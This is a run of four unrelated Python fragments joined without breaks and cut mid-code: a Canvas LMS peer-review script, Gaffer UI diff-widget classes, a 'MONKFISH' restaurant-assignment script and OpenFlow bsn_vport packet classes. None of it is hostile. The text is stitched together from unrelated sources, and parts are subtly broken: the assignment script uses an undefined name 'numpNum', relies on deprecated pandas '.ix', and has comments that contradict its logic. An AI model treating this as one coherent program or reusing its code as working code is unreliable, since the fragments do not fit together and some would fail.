reviews_found_thus_far.append(p_response) return reviews_found_thus_far def submission_for_assignment_by_user(course_id, assignment_id, user_id): # return the submission information for a single user's assignment for a specific course as a dict # # Use the Canvas API to get a user's submission for a course for a specific assignment # GET /api/v1/courses/:course_id/assignments/:assignment_id/submissions/:user_id url = "{0}/courses/{1}/assignments/{2}/submissions/{3}".format(baseUrl, course_id, assignment_id, user_id) if Verbose_Flag: print("url: {}".format(url)) #extra_parameters={'student_ids[]': 'all'} #r = requests.get(url, params=extra_parameters, headers = header) r = requests.get(url, headers = header) if Verbose_Flag: print("result of getting submissions: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() if Verbose_Flag: print("page_response: " + str(page_response)) return page_response else: return dict() def assign_peer_reviewer(course_id, assignment_id, user_id, submission_id): global Verbose_Flag # Use the Canvas API #POST /api/v1/courses/:course_id/assignments/:assignment_id/submissions/:submission_id/peer_reviews # Request Parameters: #Parameter Type Description # user_id Required integer user_id to assign as reviewer on this assignment # # from https://github.com/matematikk-mooc/frontend/blob/master/src/js/api/api.js # createPeerReview: function(courseID, assignmentID, submissionID, userID, callback, error) { # this._post({ # "callback": callback, # "error": error, # "uri": "/courses/" + courseID + "/assignments/" + assignmentID + "/submissions/" + submissionID + "/peer_reviews", # "params": { user_id: userID } # }); # }, url = "{0}/courses/{1}/assignments/{2}/submissions/{3}/peer_reviews".format(baseUrl, course_id, assignment_id, submission_id) if Verbose_Flag: print("url: {}".format(url)) payload={'user_id': user_id} r = requests.post(url, headers = header, data=payload) if Verbose_Flag: print("result of post assigning peer reviwer: {}".format(r.text)) if r.status_code == requests.codes.ok: print("result of post assigning peer reviwer: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() print("assigned reviewer") return True return False def assign_assessor_as_peer_reviewer(course_id, assignment_id, assessor_id, user_id): submission=submission_for_assignment_by_user(course_id, assignment_id, user_id) if Verbose_Flag: print("submission: {}".format(submission)) if Verbose_Flag: print("user_id: {}".format(submission['user_id'])) if submission['user_id'] == int(user_id): if Verbose_Flag: print("matching submission: {}".format(submission)) output=assign_peer_reviewer(course_id, assignment_id, assessor_id, submission['id']) return output return "no match found" def copy_assigned_peer_reviewers(course_id, old_assignment_id, new_assignment_id): # students=students_in_course(course_id) # for student in students: old_list=list_peer_reviews(course_id, old_assignment_id) if Verbose_Flag: print("old_list: {}".format(old_list)) for previous_peer_assignment in old_list: assessor_id=previous_peer_assignment['assessor_id'] user_id=previous_peer_assignment['user_id'] if Verbose_Flag: print("assessor_id: {}".format(assessor_id)) print("user_id: {}".format(user_id)) assign_assessor_as_peer_reviewer(course_id, new_assignment_id, assessor_id, user_id) new_list=list_peer_reviews(course_id, new_assignment_id) if Verbose_Flag: print("new_list: " + str(new_list)) def section_name_from_section_id(sections_info, section_id): for i in sections_info: if i['id'] == section_id: return i['name'] def sections_in_course(course_id): sections_found_thus_far=[] # Use the Canvas API to get the list of sections for this course #GET /api/v1/courses/:course_id/sections url = "{0}/courses/{1}/sections".format(baseUrl,course_id) if Verbose_Flag: print("url: {}".format(url)) r = requests.get(url, headers = header) if Verbose_Flag: print("result of getting sections: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: sections_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500 while r.links.get('next', False): r = requests.get(r.links['next']['url'], headers=header) page_response = r.json() for p_response in page_response: sections_found_thus_far.append(p_response) return sections_found_thus_far def students_in_course(course_id): user_found_thus_far=[] # Use the Canvas API to get the list of users enrolled in this course #GET /api/v1/courses/:course_id/enrollments url = "{0}/courses/{1}/enrollments".format(baseUrl,course_id) if Verbose_Flag: print("url: {}".format(url)) extra_parameters={'per_page': '100', 'type[]': ['StudentEnrollment']} r = requests.get(url, params=extra_parameters, headers = header) if Verbose_Flag: print("result of getting enrollments: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: user_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500 while r.links.get('next', False): r = requests.get(r.links['next']['url'], headers=header) page_response = r.json() for p_response in page_response: user_found_thus_far.append(p_response) return user_found_thus_far def list_groups_in_course(course_id): groups_found_thus_far=[] # Use the Canvas API to get the list of groups for the course # GET /api/v1/courses/:course_id/groups url = "{0}/courses/{1}/groups".format(baseUrl, course_id) if Verbose_Flag: print("url: {}".format(url)) r = requests.get(url, headers = header) if Verbose_Flag: print("result of getting groups: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: groups_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500 if 'link' in r.headers: while r.links.get('next', False): r = requests.get(r.links['next']['url'], headers=header) page_response = r.json() for p_response in page_response: groups_found_thus_far.append(p_response) return groups_found_thus_far def members_of_groups(group_id): members_found_thus_far=[] # Use the Canvas API to get the list of members of group # GET /api/v1/groups/:group_id/users url = "{0}/groups/{1}/users".format(baseUrl, group_id) if Verbose_Flag: print("url: {}".format(url)) r = requests.get(url, headers = header) if Verbose_Flag: print("result of getting memebrs of group: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: members_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr
values[1] ) or values[0] != values[1] ) visibilities = [ len( values ) > 0 and values[0] is not None, len( values ) > 1 and values[1] is not None and different ] for i in range( 0, 2 ) : self.frame( i ).setVisible( visibilities[i] ) cornerWidget = self.getCornerWidget( i ) if cornerWidget is not None : cornerWidget.setVisible( visibilities[i] ) name = "gafferDiffA" if different else "" if name != self.frame( 0 )._qtWidget().objectName() : self.frame( 0 )._qtWidget().setObjectName( name ) self.frame( 0 )._repolish() class TextDiff( SideBySideDiff ) : def __init__( self, highlightDiffs=True, **kw ) : SideBySideDiff.__init__( self, **kw ) self.__connections = [] for i in range( 0, 2 ) : label = GafferUI.Label() self.__connections.append( label.buttonPressSignal().connect( Gaffer.WeakMethod( self.__buttonPress ) ) ) self.__connections.append( label.dragBeginSignal().connect( Gaffer.WeakMethod( self.__dragBegin ) ) ) self.__connections.append( label.dragEndSignal().connect( Gaffer.WeakMethod( self.__dragEnd ) ) ) self.frame( i ).setChild( label ) self.__highlightDiffs = highlightDiffs def update( self, values ) : SideBySideDiff.update( self, values ) self.__values = values formattedValues = self.__formatValues( values ) for i, value in enumerate( formattedValues ) : self.frame( i ).getChild().setText( self.__htmlHeader + value + self.__htmlFooter ) def __formatValues( self, values ) : if len( values ) == 0 : return [] elif len( values ) == 2 and type( values[0] ) != type( values[1] ) : # different types - format each separately return self.__formatValues( [ values[0] ] ) + self.__formatValues( [ values[1] ] ) elif isinstance( values[0], IECore.Data ) and hasattr( values[0], "value" ) : return self.__formatValues( [ v.value for v in values ] ) elif isinstance( values[0], ( IECore.V3f, IECore.V3i, IECore.V2f, IECore.V2i ) ) : return self.__formatVectors( values ) elif isinstance( values[0], ( IECore.M44f, IECore.M44d ) ) : return self.__formatMatrices( values ) elif isinstance( values[0], ( IECore.Box3f, IECore.Box3d, IECore.Box3i, IECore.Box2f, IECore.Box2d, IECore.Box2i ) ) : return self.__formatBoxes( values ) elif isinstance( values[0], ( IECore.Shader, IECore.ObjectVector ) ) : return self.__formatShaders( values ) elif isinstance( values[0], ( float, int ) ) : return self.__formatNumbers( values ) elif isinstance( values[0], basestring ) : return self.__formatStrings( [ str( v ) for v in values ] ) elif isinstance( values[0], IECore.PrimitiveVariable ) : return self.__formatPrimitiveVariables( values ) else : return [ cgi.escape( str( v ) ) for v in values ] def __formatVectors( self, vectors ) : arrays = [ [ v ] for v in vectors ] return self.__formatNumberArrays( arrays ) def __formatMatrices( self, matrices ) : arrays = [] for matrix in matrices : array = [] for i in range( 0, matrix.dimensions()[0] ) : array.append( [ matrix[i,j] for j in range( 0, matrix.dimensions()[1] ) ] ) arrays.append( array ) return self.__formatNumberArrays( arrays ) def __formatBoxes( self, boxes ) : if any( b.isEmpty() for b in boxes ) : # We can't diff empty boxes against non-empty, because they're formatted differently. return [ self.__formatBoxes( [ b ] )[0] if not b.isEmpty() else "Empty" for b in boxes ] arrays = [] for box in boxes : arrays.append( [ box.min, box.max ] ) return self.__formatNumberArrays( arrays ) def __formatNumbers( self, values ) : values = self.__numbersToAlignedStrings( values ) values = self.__highlightFromFirstDifference( values ) return [ "<pre>" + v + "</pre>" for v in values ] def __formatNumberArrays( self, values ) : # values is a list of 2d arrays of numbers. # stack one atop the other, and then format all # the values for each column together, so that they # are aligned. rows = itertools.chain( *values ) columns = zip( *(row for row in rows) ) formattedColumns = [ self.__numbersToAlignedStrings( c ) for c in columns ] # transform back into a list of 2d arrays of # formatted strings. formattedRows = zip( *formattedColumns ) values = zip( *( [ iter( formattedRows ) ] * len( values[0] ) ) ) # build the tables. it'd be nice to control cellspacing # in the stylesheet, but qt doesn't seem to support that. result = [ "<table cellspacing=2>" ] * len( values ) for row in range( 0, len( values[0] ) ) : result = [ r + "<tr>" for r in result ] for column in range( 0, len( values[0][row] ) ) : cellValues = self.__highlightFromFirstDifference( [ v[row][column] for v in values ] ) cells = [ "<td><pre>" + v + "</pre></td>" for v in cellValues ] for resultIndex, cell in enumerate( cells ) : result[resultIndex] += cell result = [ r + "</tr>" for r in result ] result = [ r + "</table>" for r in result ] return result def __formatShaders( self, values ) : formattedValues = [] for value in values : shader = value[-1] if isinstance( value, IECore.ObjectVector ) else value shaderName = shader.name nodeName = shader.blindData().get( "gaffer:nodeName", None ) formattedValue = "<table cellspacing=2><tr>" if nodeName is not None : nodeColor = shader.blindData().get( "gaffer:nodeColor", None ) if nodeColor is not None : nodeColor = GafferUI.Widget._qtColor( nodeColor.value ).name() else : nodeColor = "#000000" formattedValue += "<td bgcolor=%s>%s</td>" % ( nodeColor, cgi.escape( nodeName.value ) ) formattedValue += "<td>(" + cgi.escape( shaderName ) + ")</td>" else : formattedValue += "<td>" + cgi.escape( shaderName ) + "</td>" formattedValue += "</tr></table>" formattedValues.append( formattedValue ) return formattedValues def __formatStrings( self, strings ) : if len( strings ) == 1 or strings[0] == strings[1] or not self.__highlightDiffs : return [ cgi.escape( s ) for s in strings ] a = strings[0] b = strings[1] aFormatted = "" bFormatted = "" for op, a1, a2, b1, b2 in difflib.SequenceMatcher( None, a, b ).get_opcodes() : if op == "equal" : aFormatted += cgi.escape( a[a1:a2] ) bFormatted += cgi.escape( b[b1:b2] ) elif op == "replace" : aFormatted += '<span class="diffA">' + cgi.escape( a[a1:a2] ) + "</span>" bFormatted += '<span class="diffB">' + cgi.escape( b[b1:b2] ) + "</span>" elif op == "delete" : aFormatted += '<span class="diffA">' + cgi.escape( a[a1:a2] ) + "</span>" elif op == "insert" : bFormatted += '<span class="diffB">' + cgi.escape( b[b1:b2] ) + "</span>" return [ aFormatted, bFormatted ] def __formatPrimitiveVariables( self, values ) : result = [] for value in values : s = str( value.interpolation ) s += " " + value.data.typeName() if hasattr( value.data, "getInterpretation" ) : s += " (" + str( value.data.getInterpretation() ) + ")" result.append( s ) return result def __numbersToAlignedStrings( self, values ) : if isinstance( values[0], int ) : values = [ "%d" % v for v in values ] else : # the funky comparison with 0.0 converts -0.0 to 0.0 values = [ "%.4f" % ( v if v != 0.0 else 0.0 ) for v in values ] if len( values ) > 1 : maxLength = max( len( v ) for v in values ) values = [ v.rjust( maxLength ) for v in values ] return values def __highlightFromFirstDifference( self, values ) : if len( values ) < 2 or not self.__highlightDiffs : return values # d is the index of the first differing digit, or -1 if there is no difference d = next( ( i for i in xrange( 0, len( values[0] ) ) if values[0][i] != values[1][i] ), -1 ) if d < 0 : return values return [ values[0][:d] + "<span class=diffA>" + values[0][d:] + "</span>", values[1][:d] + "<span class=diffB>" + values[1][d:] + "</span>", ] def __buttonPress( self, widget, event ) : return event.buttons == event.Buttons.Left def __dragBegin( self, widget, event ) : if event.buttons != event.Buttons.Left : return None GafferUI.Pointer.setCurrent( "values" ) return self.__values[0] if self.frame( 0 ).isAncestorOf( widget ) else self.__values[1] def __dragEnd( self, widget, event ) : GafferUI.Pointer.setCurrent( None ) __htmlHeader = ( "<html><head><style type=text/css>" ".diffA { background-color:rgba( 255, 77, 3, 75 ); }" ".diffB { background-color:rgba( 167, 214, 6, 75 ); }" "td { padding:3px; }" "</style></head>" "<body>" ) __htmlFooter = "</body></html>" ########################################################################## # Row ########################################################################## ## A class to simplify the process of making rows with alternating colours. class Row( GafferUI.Widget ) : def __init__( self, borderWidth = 4, alternate = False, **kw ) : self.__frame = GafferUI.Frame( borderWidth = borderWidth ) GafferUI.Widget.__init__( self, self.__frame, **kw ) self.__frame.setChild( GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 ) ) self.__alternate = None self.setAlternate( alternate ) def listContainer( self ) : return self.__frame.getChild() def setAlternate( self, alternate ) : if alternate == self.__alternate : return self.__alternate = alternate self.__frame._qtWidget().setObjectName( "gafferLighter" if alternate else "" ) self.__frame._repolish() def getAlternate( self ) : return self.__alternate ########################################################################## # Inspector ########################################################################## ## Abstract class for a callable which inspects a Target and returns # a value. Inspectors are key to allowing the UI to perform the same # query over multiple targets to generate history and inheritance # queries. class Inspector( object ) : ## Must be implemented to return a descriptive name # for what is being inspected. def name( self ) : raise NotImplementedError ## Should return True if the Inspector's results # are based on attributes - this will enable inheritance # queries for the inspector. def inspectsAttributes( self ) : return False ## Must be implemented to inspect the target and return # a value to be displayed. When inspectsAttributes()==True, # this method must accept an ignoreInheritance keyword # argument (defaulting to False). def __call__( self, target, **kw ) : raise NotImplementedError ## May be implemented to return a list of "child" inspectors - # this is used by the DiffColumn to obtain
#MONKFISH v 0.1 #<EMAIL> import pandas as pd import numpy as np import random print("\nLoading data...\n") ################################################## ###YOU CAN CHANGE THE NAME OF DATA FILE HERE!!!### data = pd.read_csv('preferences2.csv', header=0,encoding="utf-8-sig")### ################################################## #################### ##SET THE CAP HERE## cap = 7 #################### dinner = data.loc[:,'Name':'SmokeShop'] brunch = data.loc[:,'Area4':] names = data['Name'] brunch = pd.concat([names,brunch], axis=1) print("The attendance cap is currently set at " + str(cap) + ".\n") kika = [] thelonious = [] smokeshop =[] ole = [] meadhall = [] indiapav = [] veggieGalaxy = [] names = data['Name'].tolist() assigned = [] unassigned = [] assignmentLists = [indiapav,thelonious,meadhall,kika,ole,smokeshop] restaurantNames = dinner.columns[1:].tolist() assignmentDict = dict(zip(restaurantNames, assignmentLists)) zeroes = [0]*len(names) preferenceScoreDict = dict(zip(names, zeroes)) for col in dinner.columns[1:]: d = dinner[col] i = 0 while i < len(d): if d[i] == 1: #assign first preference assignmentDict[col].append(names[i]) #mark the person as assigned. assigned.append(names[i]) #update the person's cumulative preference score preferenceScoreDict[names[i]] += 1 i += 1 #Now all first choices have been granted, check whether any restaurants are over capacity def dinnerCapacityCheck(): dinnerOverassigned = [] dinnerUnderassigned = [] dinnerFull = [] for rest in restaurantNames: if len(assignmentDict[rest]) > cap: #print(str(rest) + ' is overassigned') dinnerOverassigned.append(rest) elif len(assignmentDict[rest]) < cap: #print(str(rest) + ' is underassigned') dinnerUnderassigned.append(rest) elif len(assignmentDict[rest]) == cap: #print(str(rest) + ' is full') dinnerFull.append(rest) return dinnerOverassigned, dinnerUnderassigned, dinnerFull dinnerOverassigned, dinnerUnderassigned, dinnerFull = dinnerCapacityCheck() dinnerDone=False if len(dinnerOverassigned) == 0: #everyone gets their first choice, ideal solution. dinnerDone = True for name in restaurantNames: print("The following have been assigned to " + str(name) + ":") for x in assignmentDict[name]: print(str(x) + '\n') elif len(dinnerOverassigned) > 0: #some people will have to be reassigned. #for each overassigned restaurant, randomly choose the number of people required to kick out to go below the cap for rest in dinnerOverassigned: dinnerList = assignmentDict[rest] bumpNum = len(dinnerList)-cap gotBumped = np.random.choice(dinnerList, bumpNum) for b in gotBumped: assignmentDict[rest].remove(b) #kick that dude out assigned.remove(b) #mark them unassigned unassigned.append(b) preferenceScoreDict[b] += 1 #increment their preference score #assign bumped people to their second choice. for x in unassigned: if x in assigned: print(str(x) + " is already assigned.") unassigned.remove(x) continue i = names.index(x) row = dinner.ix[i] #this should be the row of the the bumped person #reassign them to their second choice j=0 #find the row index of this person who must be reassigned. while j < len(dinner['Name']): if dinner['Name'][j] == x: break j += 1 #Search for which restaurant was their second choice. for col in dinner.columns[1:]: d = dinner[col][j] if d == 2: #assign second preference assignmentDict[col].append(names[j]) #mark the person as assigned. if names[j] not in assigned: assigned.append(names[j]) for a in assigned: if a in unassigned: unassigned.remove(a) dinnerOverassigned, dinnerUnderassigned, dinnerFull = dinnerCapacityCheck() #now second choices have been assigned. if len(dinnerOverassigned) == 0 and dinnerDone==False: dinnerDone = True for name in restaurantNames: print("The following have been assigned to " + str(name) + ":") for x in assignmentDict[name]: print(str(x) + '\n') #consider bumping people to third choice. elif len(dinnerOverassigned) > 0 and dinnerDone==False: #some people will have to be reassigned. #for each overassigned restaurant, randomly choose the number of people required to kick out to go below the cap for rest in dinnerOverassigned: dinnerList = assignmentDict[rest] bumpNum = len(dinnerList)-cap bumpOrder = [] bumpOrder = random.sample(dinnerList, len(dinnerList)) #want to preferentially bump people who haven't yet been bumped. gotBumped = [] if len(bumpOrder) > 0: for x in bumpOrder: if len(gotBumped) == bumpNum: break if preferenceScoreDict[x] == 1: gotBumped.append(x) else: continue for b in gotBumped: assignmentDict[rest].remove(b) #kick that dude out assigned.remove(b) #mark them unassigned unassigned.append(b) preferenceScoreDict[b] += 1 #increment their preference score #assign bumped people to their second choice. for x in unassigned: if x in assigned: print(str(x) + " is already assigned.") unassigned.remove(x) continue i = names.index(x) row = dinner.ix[i] #this should be the row of the the bumped person #reassign them to their second choice j=0 #find the row index of this person who must be reassigned. while j < len(dinner['Name']): if dinner['Name'][j] == x: break j += 1 #Search for which restaurant was their third choice. for col in dinner.columns[1:]: d = dinner[col][j] if d == 3: #assign second preference assignmentDict[col].append(names[j]) #mark the person as assigned. if names[j] not in assigned: assigned.append(names[j]) for a in assigned: if a in unassigned: unassigned.remove(a) dinnerOverassigned, dinnerUnderassigned, dinnerFull = dinnerCapacityCheck() #if still overassigned after the second choice, run the brunch algorithm #then minimize preference scores as a last resort. if len(dinnerOverassigned) == 0 and dinnerDone==False: dinnerDone = True for name in restaurantNames: print("The following have been assigned to " + str(name) + ":") for x in assignmentDict[name]: print(str(x) + '\n') ####START OF BRUNCH### print("\nBeep Boop...assigning brunches...boop beep\n") Area4 = [] PaintedBurro = [] RusselHouse =[] Christophers = [] Ryles = [] CambridgeCommons = [] veggieGalaxy = [] assigned = [] unassigned = [] assignmentLists = [Area4,CambridgeCommons,Christophers,PaintedBurro,Ryles,veggieGalaxy,RusselHouse] restaurantNames = brunch.columns[1:].tolist() assignmentDict = dict(zip(restaurantNames, assignmentLists)) for col in brunch.columns[1:]: d = brunch[col] i = 0 while i < len(d): if d[i] == 1: #assign first preference assignmentDict[col].append(names[i]) #mark the person as assigned. assigned.append(names[i]) #update the person's cumulative preference score preferenceScoreDict[names[i]] += 1 i += 1 #Now all first choices have been granted, check whether any restaurants are over capacity def brunchCapacityCheck(): brunchOverassigned = [] brunchUnderassigned = [] brunchFull = [] for rest in restaurantNames: if len(assignmentDict[rest]) > cap: #print(str(rest) + ' is overassigned') brunchOverassigned.append(rest) elif len(assignmentDict[rest]) < cap: #print(str(rest) + ' is underassigned') brunchUnderassigned.append(rest) elif len(assignmentDict[rest]) == cap: #print(str(rest) + ' is full') brunchFull.append(rest) return brunchOverassigned, brunchUnderassigned, brunchFull brunchOverassigned, brunchUnderassigned, brunchFull = brunchCapacityCheck() brunchDone=False if len(brunchOverassigned) == 0: #everyone gets their first choice, ideal solution. brunchDone = True for name in restaurantNames: print("The following have been assigned to " + str(name) + ":") for x in assignmentDict[name]: print(str(x) + '\n') elif len(brunchOverassigned) > 0: #some people will have to be reassigned. #for each overassigned restaurant, randomly choose the number of people required to kick out to go below the cap for rest in brunchOverassigned: brunchList = assignmentDict[rest] bumpNum = len(brunchList)-cap gotBumped = np.random.choice(brunchList, bumpNum) for b in gotBumped: assignmentDict[rest].remove(b) #kick that dude out assigned.remove(b) #mark them unassigned unassigned.append(b) preferenceScoreDict[b] += 1 #increment their preference score #assign bumped people to their second choice. for x in unassigned: if x in assigned: print(str(x) + " is already assigned.") unassigned.remove(x) continue #print(x) i = names.index(x) row = brunch.ix[i] #this should be the row of the the bumped person #reassign them to their second choice j=0 #find the row index of this person who must be reassigned. while j < len(brunch['Name']): if brunch['Name'][j] == x: break j += 1 #Search for which restaurant was their second choice. for col in brunch.columns[1:]: d = brunch[col][j] if d == 2: #assign second preference assignmentDict[col].append(names[j]) #mark the person as assigned. if names[j] not in assigned: assigned.append(names[j]) for a in assigned: if a in unassigned: unassigned.remove(a) brunchOverassigned, brunchUnderassigned,brunchFull = brunchCapacityCheck() if len(brunchOverassigned) == 0 and brunchDone==False: brunchDone = True for name in restaurantNames: print("The following have been assigned to " + str(name) + ":") for x in assignmentDict[name]: print(str(x) + '\n') #consider bumping people to third choice. elif len(brunchOverassigned) > 0 and brunchDone==False: #some people will have to be reassigned. #for each overassigned restaurant, randomly choose the number of people required to kick out to go below the cap for rest in brunchOverassigned: brunchList = assignmentDict[rest] bumpNum = len(brunchList)-cap bumpOrder = [] bumpOrder = random.sample(brunchList,len(brunchList)) #want to preferentially bump people who haven't yet been bumped. gotBumped = [] if len(bumpOrder) > 0: for x in bumpOrder: if len(gotBumped) == bumpNum: break if preferenceScoreDict[x] == 1: gotBumped.append(x) else: continue if len(gotBumped) < bumpNum: for x in bumpOrder: if len(gotBumped) == bumpNum: break if preferenceScoreDict[x] == 2: gotBumped.append(x) else: continue if len(gotBumped) < numpNum: for x in bumpOrder: if len(gotBumped) == bumpNum: break if preferenceScoreDict[x] == 3: gotBumped.append(x) else: continue for b in gotBumped: assignmentDict[rest].remove(b) #kick that dude out assigned.remove(b) #mark them unassigned unassigned.append(b) preferenceScoreDict[b] += 1 #increment their preference score #assign bumped people to their third choice. for x in unassigned: if x in assigned: print(str(x) + " is already assigned.") unassigned.remove(x) continue #print(x) i = names.index(x) row = brunch.ix[i] #this should be the row of the the bumped person #reassign them to their second choice j=0 #find the
= 0 if mac != None: self.mac = mac else: self.mac = [0,0,0,0,0,0] return def pack(self): packed = [] packed.append(struct.pack("!H", self.vlan_vid)) packed.append(struct.pack("!6B", *self.mac)) return functools.reduce(lambda x,y: x+y, packed) @staticmethod def unpack(reader): obj = bsn_vlan_mac() obj.vlan_vid = reader.read("!H")[0] obj.mac = list(reader.read('!6B')) return obj def __eq__(self, other): if type(self) != type(other): return False if self.vlan_vid != other.vlan_vid: return False if self.mac != other.mac: return False return True def pretty_print(self, q): q.text("bsn_vlan_mac {") with q.group(): with q.indent(2): q.breakable() q.text("vlan_vid = "); q.text("%#x" % self.vlan_vid) q.text(","); q.breakable() q.text("mac = "); q.text(util.pretty_mac(self.mac)) q.breakable() q.text('}') class bsn_vport_l2gre(bsn_vport): type = 1 def __init__(self, flags=None, port_no=None, loopback_port_no=None, local_mac=None, nh_mac=None, src_ip=None, dst_ip=None, dscp=None, ttl=None, vpn=None, rate_limit=None, if_name=None): if flags != None: self.flags = flags else: self.flags = 0 if port_no != None: self.port_no = port_no else: self.port_no = 0 if loopback_port_no != None: self.loopback_port_no = loopback_port_no else: self.loopback_port_no = 0 if local_mac != None: self.local_mac = local_mac else: self.local_mac = [0,0,0,0,0,0] if nh_mac != None: self.nh_mac = nh_mac else: self.nh_mac = [0,0,0,0,0,0] if src_ip != None: self.src_ip = src_ip else: self.src_ip = 0 if dst_ip != None: self.dst_ip = dst_ip else: self.dst_ip = 0 if dscp != None: self.dscp = dscp else: self.dscp = 0 if ttl != None: self.ttl = ttl else: self.ttl = 0 if vpn != None: self.vpn = vpn else: self.vpn = 0 if rate_limit != None: self.rate_limit = rate_limit else: self.rate_limit = 0 if if_name != None: self.if_name = if_name else: self.if_name = "" return def pack(self): packed = [] packed.append(struct.pack("!H", self.type)) packed.append(struct.pack("!H", 0)) # placeholder for length at index 1 packed.append(struct.pack("!L", self.flags)) packed.append(util.pack_port_no(self.port_no)) packed.append(util.pack_port_no(self.loopback_port_no)) packed.append(struct.pack("!6B", *self.local_mac)) packed.append(struct.pack("!6B", *self.nh_mac)) packed.append(struct.pack("!L", self.src_ip)) packed.append(struct.pack("!L", self.dst_ip)) packed.append(struct.pack("!B", self.dscp)) packed.append(struct.pack("!B", self.ttl)) packed.append(b'\x00' * 2) packed.append(struct.pack("!L", self.vpn)) packed.append(struct.pack("!L", self.rate_limit)) packed.append(struct.pack("!16s", self.if_name.encode())) length = sum([len(x) for x in packed]) packed[1] = struct.pack("!H", length) return functools.reduce(lambda x,y: x+y, packed) @staticmethod def unpack(reader): obj = bsn_vport_l2gre() _type = reader.read("!H")[0] assert(_type == 1) _length = reader.read("!H")[0] orig_reader = reader reader = orig_reader.slice(_length, 4) obj.flags = reader.read("!L")[0] obj.port_no = util.unpack_port_no(reader) obj.loopback_port_no = util.unpack_port_no(reader) obj.local_mac = list(reader.read('!6B')) obj.nh_mac = list(reader.read('!6B')) obj.src_ip = reader.read("!L")[0] obj.dst_ip = reader.read("!L")[0] obj.dscp = reader.read("!B")[0] obj.ttl = reader.read("!B")[0] reader.skip(2) obj.vpn = reader.read("!L")[0] obj.rate_limit = reader.read("!L")[0] obj.if_name = reader.read("!16s")[0].decode().rstrip("\x00") return obj def __eq__(self, other): if type(self) != type(other): return False if self.flags != other.flags: return False if self.port_no != other.port_no: return False if self.loopback_port_no != other.loopback_port_no: return False if self.local_mac != other.local_mac: return False if self.nh_mac != other.nh_mac: return False if self.src_ip != other.src_ip: return False if self.dst_ip != other.dst_ip: return False if self.dscp != other.dscp: return False if self.ttl != other.ttl: return False if self.vpn != other.vpn: return False if self.rate_limit != other.rate_limit: return False if self.if_name != other.if_name: return False return True def pretty_print(self, q): q.text("bsn_vport_l2gre {") with q.group(): with q.indent(2): q.breakable() q.text("flags = "); value_name_map = {1: 'OF_BSN_VPORT_L2GRE_LOCAL_MAC_IS_VALID', 2: 'OF_BSN_VPORT_L2GRE_DSCP_ASSIGN', 4: 'OF_BSN_VPORT_L2GRE_DSCP_COPY', 8: 'OF_BSN_VPORT_L2GRE_LOOPBACK_IS_VALID', 16: 'OF_BSN_VPORT_L2GRE_RATE_LIMIT_IS_VALID'} q.text(util.pretty_flags(self.flags, value_name_map.values())) q.text(","); q.breakable() q.text("port_no = "); q.text(util.pretty_port(self.port_no)) q.text(","); q.breakable() q.text("loopback_port_no = "); q.text(util.pretty_port(self.loopback_port_no)) q.text(","); q.breakable() q.text("local_mac = "); q.text(util.pretty_mac(self.local_mac)) q.text(","); q.breakable() q.text("nh_mac = "); q.text(util.pretty_mac(self.nh_mac)) q.text(","); q.breakable() q.text("src_ip = "); q.text(util.pretty_ipv4(self.src_ip)) q.text(","); q.breakable() q.text("dst_ip = "); q.text(util.pretty_ipv4(self.dst_ip)) q.text(","); q.breakable() q.text("dscp = "); q.text("%#x" % self.dscp) q.text(","); q.breakable() q.text("ttl = "); q.text("%#x" % self.ttl) q.text(","); q.breakable() q.text("vpn = "); q.text("%#x" % self.vpn) q.text(","); q.breakable() q.text("rate_limit = "); q.text("%#x" % self.rate_limit) q.text(","); q.breakable() q.text("if_name = "); q.pp(self.if_name) q.breakable() q.text('}') bsn_vport.subtypes[1] = bsn_vport_l2gre class bsn_vport_q_in_q(bsn_vport): type = 0 def __init__(self, port_no=None, ingress_tpid=None, ingress_vlan_id=None, egress_tpid=None, egress_vlan_id=None, if_name=None): if port_no != None: self.port_no = port_no else: self.port_no = 0 if ingress_tpid != None: self.ingress_tpid = ingress_tpid else: self.ingress_tpid = 0 if ingress_vlan_id != None: self.ingress_vlan_id = ingress_vlan_id else: self.ingress_vlan_id = 0 if egress_tpid != None: self.egress_tpid = egress_tpid else: self.egress_tpid = 0 if egress_vlan_id != None: self.egress_vlan_id = egress_vlan_id else: self.egress_vlan_id = 0 if if_name != None: self.if_name = if_name else: self.if_name = "" return def pack(self): packed = [] packed.append(struct.pack("!H", self.type)) packed.append(struct.pack("!H", 0)) # placeholder for length at index 1 packed.append(struct.pack("!L", self.port_no)) packed.append(struct.pack("!H", self.ingress_tpid)) packed.append(struct.pack("!H", self.ingress_vlan_id)) packed.append(struct.pack("!H", self.egress_tpid)) packed.append(struct.pack("!H", self.egress_vlan_id)) packed.append(struct.pack("!16s", self.if_name.encode())) length = sum([len(x) for x in packed]) packed[1] = struct.pack("!H", length) return functools.reduce(lambda x,y: x+y, packed) @staticmethod def unpack(reader): obj = bsn_vport_q_in_q() _type = reader.read("!H")[0] assert(_type == 0) _length = reader.read("!H")[0] orig_reader = reader reader = orig_reader.slice(_length, 4) obj.port_no = reader.read("!L")[0] obj.ingress_tpid = reader.read("!H")[0] obj.ingress_vlan_id = reader.read("!H")[0] obj.egress_tpid = reader.read("!H")[0] obj.egress_vlan_id = reader.read("!H")[0] obj.if_name = reader.read("!16s")[0].decode().rstrip("\x00") return obj def __eq__(self, other): if type(self) != type(other): return False if self.port_no != other.port_no: return False if self.ingress_tpid != other.ingress_tpid: return False if self.ingress_vlan_id != other.ingress_vlan_id: return False if self.egress_tpid != other.egress_tpid: return False if self.egress_vlan_id != 